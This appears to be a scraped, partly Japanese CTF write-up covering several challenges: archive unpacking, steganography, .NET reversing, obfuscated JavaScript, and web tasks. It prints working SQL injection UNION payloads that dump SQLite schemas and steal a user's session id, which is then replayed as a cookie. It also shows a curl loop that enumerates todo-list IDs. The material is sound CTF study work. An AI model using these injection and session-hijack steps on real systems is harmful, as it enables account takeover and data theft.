Nomination
Time Remaining: 0d 8h 24m 15s
Grab Bag - 100 points
Description
Surprised Pikachu is old. Let’s get this surprised cat going.
フラグは、
MCA{g1jVx4a2zcpoZx2q}
Grab Bag - 100 points
Surprised Pikachu is old. Let’s get this surprised cat going.
MCA{g1jVx4a2zcpoZx2q}
Grab Bag - 100 points
$ file flagflag: bzip2 compressed data, block size = 400k
$ file flagflag.dat: Zip archive data, at least v2.0 to extract
mv -f flag flag2while :doif [ "`cat flag2 | grep MCA{`" ]; then break; fiout=`file flag2`echo $outcase "$out" in*bzip2* )mv -f flag2 flag2.bz2bunzip2 flag2.bz2;;*Zip* )unzip flag2mv -f flag flag2;;*ASCII* )base64 -d flag2 > flagmv -f flag flag2;;*gzip* )mv -f flag2 flag2.gzgunzip flag2.gz;;*init=* )base64 -d flag2 > flagmv -f flag flag2;;* )break;;esacdone
MCA{Wh0_Needz_File_Extensions?}
Web - 100 points
for i in `seq 1 1000`doout=`curl 138.247.13.110/todolist/$i/`if [ "`echo $out | grep MCA{`" ]; then break; fidoneecho $out
<!DOCTYPE html> <html lang="en"> <head> <!-- Basic Page Needs –––––––––––––––––––––––––––––––––––––––––––––––––– --> <meta charset="utf-8"> <title>Todolist</title> <meta name="description" content="Small todolist app."> <meta name="author" content="Christian Rotzoll"> <!-- Mobile Specific Metas –––––––––––––––––––––––––––––––––––––––––––––––––– --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- FONT –––––––––––––––––––––––––––––––––––––––––––––––––– --> <link href='http://fonts.googleapis.com/css?family=Raleway:400,300,600' rel='stylesheet' type='text/css'> <!-- CSS –––––––––––––––––––––––––––––––––––––––––––––––––– --> <link rel="stylesheet" type='text/css' href="https://cdnjs.cloudflare.com/ajax/libs/normalize/3.0.2/normalize.min.css"> <link rel="stylesheet" type='text/css' href="https://cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css"> <link rel="stylesheet" type='text/css' href="/static/css/custom.css"> <!-- Scripts –––––––––––––––––––––––––––––––––––––––––––––––––– --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script> <script type="text/javascript" src="/static/js/site.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/moment.js/2.9.0/moment.min.js"></script> <script src="/static/lists/js/lists.js"></script> <!-- Favicon –––––––––––––––––––––––––––––––––––––––––––––––––– --> <link rel="icon" type="image/png" href="/static/images/favicon.png" /> </head> <body> <!-- Primary Page Layout –––––––––––––––––––––––––––––––––––––––––––––––––– --> <div class="container"> <!-- Navigation –––––––––––––––––––––––––––––––––––––––––––––––––– --> <div class="navbar-spacer"></div> <nav class="navbar"> <div class="container"> <ul class="navbar-list"> <li class="navbar-item"><a class="navbar-link" href="/">Todolist</a></li> <li class="navbar-item"></li> </ul> </div> </nav> <section class="header"> <div class="row"> <div class="three columns value-prop"></div> <div class="six columns"> <div class="title">By MITRECTF:</div> <form action="/todo/add/678/" method=post> <input type='hidden' name='csrfmiddlewaretoken' value='0rG0HOuNVMinZEZvzuh0ONCZ1ExYstCr1bcbeEVMcSvYOxfxITknt7T0Krwykcn7' /> <tr><th></th><td><input type="text" name="description" class="u-full-width" id="id_description" placeholder="Enter your todo" required maxlength="128" /></td></tr> <input type="submit" value="Submit"> </form> </div> <div class="row"> <div class="one-half column open-todos"> <h6 class="docs-header open-todos">1 open</h6> <ul> <li><input type="checkbox" id="checkbox" data-todo-id="678"> MCA{al3x4_5et_a_r3minder}</li> </ul> </div> <div class="one-half column finished-todos"> <h6 class="docs-header finished-todos">0 finished</h6> <ul> </ul> </div> </div> </div> </section> </div> <!-- End Document –––––––––––––––––––––––––––––––––––––––––––––––––– --> </body> </html>
です。MCA{al3x4_5et_a_r3minder}
Sanity Check 1
1
Find the flag in topic of the Slack channel
Author : Al Capwn
evlz{I_pledge_to_play_fair_and_I_promise_to_not_attack_the_infrastructure}ctf
you`ll need your glasses or good pair of eyes and some brainzzz.
$ file finalfinal: data
この文字列をsubmitしてみますがフラグではないようです。3c034c8ecf5121fc23612ef9d71756b0
抽出したテキストファイルに記載されている文字列をsubmitしてみるとフラグでした。$ steghide --extract -sf final.bmp -p 3c034c8ecf5121fc23612ef9d71756b0 -xf aaa.txtwrote extracted data to "aaa.txt".
です。d78e573bcae3899be1751e414c17b84c
Maria is the only person who can view the flag
X-Forwarded-Forとは、HTTPヘッダフィールドの1つであり、ロードバランサなどの機器を経由してWebサーバに接続するクライアントの送信元IPアドレスを特定する際のデファクトスタンダードです。
2つのテーブル名が取得できました。' union select 1, 2, 3, group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--
PHPSESSID=nxf8_users%2Cnxf8_sessions;
次のようにCREATE TABLE文を取得できました。' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_users'--
PHPSESSID=CREATE+TABLE+%22nxf8_users%22+%28%0A++++++++++++%22id%22+int%2810%29+NOT+NULL%2C%0A++++++++++++%22name%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22email%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22password%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22role%22+varchar%28100%29++DEFAULT+NULL%0A++++++++%29;
CREATE TABLE "nxf8_users" ("id" int(10) NOT NULL,"name" varchar(255) NOT NULL,"email" varchar(255) NOT NULL,"password" varchar(255) NOT NULL,"role" varchar(100) DEFAULT NULL);
' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_sessions'--
CREATE TABLE "nxf8_sessions" ("id" int(10) NOT NULL,"user_id" varchar(255) NOT NULL,"ip_address" varchar(255) NOT NULL,"session_id" varchar(255) NOT NULL);
' union select 1, 2, 3, id FROM nxf8_users where name = 'Maria'--
PHPSESSID=5;
' union select 1, 2, 3, session_id FROM nxf8_sessions where user_id = '5'--
PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968;
Cookie: PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968;
aj9dhAdf4
can you get the flag out to hack a nice day. Note: Flag format flag{XXXXXXX}
$ file info.jpginfo.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "badisbad", baseline, precision 8, 194x259, frames 3
$ steghide extract -sf info.jpgEnter passphrase: badisbadwrote extracted data to "flaggg.txt".
flag{Stegn0_1s_n!ce}
Can you find the password to obtain the flag?
$ file ScrambledEgg.exeScrambledEgg.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
public char[] Letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_".ToCharArray();private void Button_Click(object sender, RoutedEventArgs e){string value = new string(new char[]{this.Letters[5],this.Letters[14],this.Letters[13],this.Letters[25],this.Letters[24]});if (this.TextBox1.Text.Equals(value)){MessageBox.Show(new string(new char[]{this.Letters[5],this.Letters[11],this.Letters[0],this.Letters[6],this.Letters[26],this.Letters[8],this.Letters[28],this.Letters[11],this.Letters[14],this.Letters[21],this.Letters[4],this.Letters[28],this.Letters[5],this.Letters[14],this.Letters[13],this.Letters[25],this.Letters[24],this.Letters[27]}));}}
なので、入力するとフラグが表示されます。FONZY
FLAG{I_LOVE_FONZY}
famous Cybersecurity conference runs by OWASP in different locations
AppSec
not pretty much many options. No need to open a link from a browser, there is always a different way
<!--var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];function reverse(_0xa6e5x2){flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])}console[_0x7f88[4]]= reverse;console[_0x7f88[4]](_0x7f88[5])-->
<script><!--var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];function reverse(_0xa6e5x2){flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])}console[_0x7f88[4]]= reverse;console[_0x7f88[4]](_0x7f88[5])--></script>
2b323f9008ed771765cd2259d860baec